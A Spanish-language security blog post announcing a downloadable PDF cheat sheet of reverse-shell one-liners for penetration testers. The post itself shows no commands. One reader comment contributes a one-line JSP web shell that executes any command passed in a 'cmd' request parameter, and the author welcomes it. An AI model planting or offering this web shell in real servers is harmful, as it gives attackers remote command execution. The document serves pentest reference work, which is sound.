#Pentester [Cheat Sheet] One-Liner Reverse Shell

4/16/2013 06:37:00 p. m. 2 comments

















Hace un tiempo escribí un artículo con una recopilación de comandos de Unix/Linux listo para ser utilizados en la etapa de "Explotation", es decir, momento en el que se explota con éxito la vulnerabilidad detectada, por ejemplo, inyectando una línea de comando que habilite una terminal remota (Shell inversa) con el que controlar el Sistema vulnerable.

Para celebrar que he superado los 800 seguidores en Twitter, he realizado una recopilación de algunos de los comandos más utilizados y populares en la creación de "Reverse Shells", o lo que es lo mismo, comandos de Linux para generar una conexión desde la victima con una Shell de Linux activa.

Esta recopilación de comandos la he plasmado en una sola hoja a modo de "chuleta" (Cheet Sheet) para  que los #Pentester y/o #Ethical Hacker (o cualquier otro profesional de la Seguridad) la tenga a mano durante un test de penetración y/o Auditoria de Seguridad.

A continuación os dejo el enlace para que podáis descargar este PDF:


SHA1: 585396e485223a5de8d8e403ba48a5b6d6e05127



Tags
Julian J. Gonzalez

Telecommunication Engineer specialized in Networks and Computer Security. Professor of the Master IT Security at the University of Seville since 2013 (http://trajano.us.es/seguridadtic/). Develop skill #Python #DevSecOps #Golang check my Github.

2 comentarios:

  1. Andriy13 jun 2013, 22:19:00

    Buenas, gracias por el share

    uno mas a la familia

    #jsp - tomcat/jsboss
    <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

    ResponderEliminar
  2. Julian J. Gonzalez14 jun 2013, 9:00:00

    Gracias! ;) Ahora habrá que ir preparando un hueco para incluirlo en el cheatsheet.

    Un Saludo.

    ResponderEliminar

Designed with by Way2themes | Distributed by Blogspot Themes